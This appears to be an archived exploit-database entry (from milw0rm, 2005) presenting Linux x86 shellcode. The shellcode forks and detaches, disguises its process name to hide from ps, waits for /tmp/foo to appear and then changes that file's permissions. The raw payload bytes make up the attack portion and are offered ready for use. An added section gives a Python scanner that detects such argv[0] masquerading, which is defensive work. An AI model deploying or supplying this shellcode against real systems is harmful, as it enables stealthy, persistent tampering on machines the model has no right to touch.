Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)
Vulnerability ID | 1055377 | Vulnerability type | |
Published | 2005-09-08 | Updated | 2005-09-08 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux_x86 | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not been disclosed
|Exploit
/*----------------------------------------------------------------------------*
* [Mystique Project: Examples of long-term payloads] *
* hide-wait-change code *
* by [email protected] & [email protected] *
*----------------------------------------------------------------------------*
* This code, upon execution, will perform the following things... *
* *
* 1) Fork a new process, and kill PPID via _exit() so we get inherited *
* by init and now have a new PID. *
* 2) Will obtain the current location of argv[0] by retrieving information *
* from /proc/self/stat. *
* 3) Copy the name we wish to masquerade as into argv[0] in memory. *
* 4) Call setsid() to establish ourselves as a process leader. *
* 5) Will sleep via nanosleep() for a given interval of time. *
* 6) Will check to see if a file exists via access(). *
* 7) If it does not, loop back to step 5 *
* 8) If it does then we chmod() the file with permissions 0455. *
* 9) Calls _exit() *
* *
* * steps 3-4 effectively hide us from most ps-listings *
* *
* size: 187 + strlen(new-proc-name) + strlen(file-to-change) *
*----------------------------------------------------------------------------*/
char shellcode[]=
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x79\x31\xc0\x40\xcd\x80\x5b\x8d"
"\x73\x10\xfe\x43\x0f\x99\x31\xc9\xb0\x05\xcd\x80\x93\x6a\x03\x58"
"\xb2\xfa\x89\xe1\x29\xd1\xcd\x80\x89\xcf\x01\xc7\x93\xfd\x6a\x20"
"\x58\x6a\x0e\x59\x87\xcb\xf2\xae\x87\xcb\xe2\xf8\x47\x47\x31\xc0"
"\x6a\x0a\x5b\xfc\x31\xd2\x8a\x0f\x83\xe9\x30\x01\xc8\x47\x80\x3f"
"\x20\x74\x04\xf7\xe3\xeb\xed\x94\x5f\x5f\x94\x57\xb1\xff\x31\xc0"
"\xf3\xaa\x5f\x56\x4e\x46\x41\x80\x3e\xff\x75\xf9\xfe\x06\x5e\xf3"
"\xa4\xb0\x42\xcd\x80\x89\xf7\x92\x48\x89\xc1\xf2\xae\xfe\x47\xff"
"\xff\xe7\xe8\x87\xff\xff\xff"
"/proc/self/stat\xff" //
"xort and izik rocks the linux box\xff" // new proc name
"/tmp/foo\xff" // file to chmod
"\x6a" //
"\x03" // sleep-time
"\x40\x89\xe1\x89\xe3\x34\xa2\xcd\x80\x31\xc9\x89\xf3\x34\x21\xcd"
"\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80";
// milw0rm.com [2005-09-08]
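A defender-side check for steps 1-4 of the header comment, added here as an example and not part of the original milw0rm code: overwriting argv[0] in memory changes /proc/<pid>/cmdline, but the comm field of /proc/<pid>/stat and the /proc/<pid>/exe link still name the real binary. The function names and indicator labels are assumptions of this example.

```python
import os

def parse_stat(stat_text):
    """Parse /proc/<pid>/stat; comm may hold spaces or ')', so cut at the last ')'."""
    lpar, rpar = stat_text.index("("), stat_text.rindex(")")
    rest = stat_text[rpar + 2:].split()  # state, ppid, pgrp, session, ...
    return {"pid": int(stat_text[:lpar]), "comm": stat_text[lpar + 1:rpar],
            "ppid": int(rest[1]), "session": int(rest[3])}

def assess(stat_text, cmdline, exe):
    """Return the indicator labels (names chosen for this example) for one process."""
    st = parse_stat(stat_text)
    argv0 = cmdline.split(b"\0", 1)[0].decode(errors="replace")
    name = os.path.basename(argv0.lstrip("-"))  # login shells run as "-bash"
    real = {st["comm"], os.path.basename(exe.replace(" (deleted)", ""))} - {""}
    hits = []
    # comm is truncated to 15 characters; daemons that retitle themselves
    # ("sshd: ...") normally keep their real name as a prefix.
    if argv0 and not any(name[:15] == r[:15] or argv0.startswith(r) for r in real):
        hits.append("argv0-mismatch")
    # Steps 1 and 4: reparented to init and leading its own session. Ordinary
    # daemons look like this too, so it only adds weight to a mismatch.
    if st["ppid"] == 1 and st["session"] == st["pid"]:
        hits.append("orphaned-session-leader")
    return hits

def scan(proc="/proc"):
    """Return {pid: hits} for live processes whose argv[0] names neither comm nor exe."""
    found = {}
    for entry in filter(str.isdigit, os.listdir(proc)):
        base = os.path.join(proc, entry)
        try:
            with open(base + "/stat", errors="replace") as f:
                stat_text = f.read()
            with open(base + "/cmdline", "rb") as f:
                cmdline = f.read()
            exe = os.readlink(base + "/exe")
        except OSError:  # exited meanwhile, kernel thread, or not permitted
            continue
        hits = assess(stat_text, cmdline, exe)
        if "argv0-mismatch" in hits:
            found[int(entry)] = hits
    return found

if __name__ == "__main__":
    for pid, hits in sorted(scan().items()):
        print(pid, ",".join(hits))
```

Run it as root so that /proc/<pid>/exe is readable for every process, and treat a hit as a lead to triage rather than a verdict.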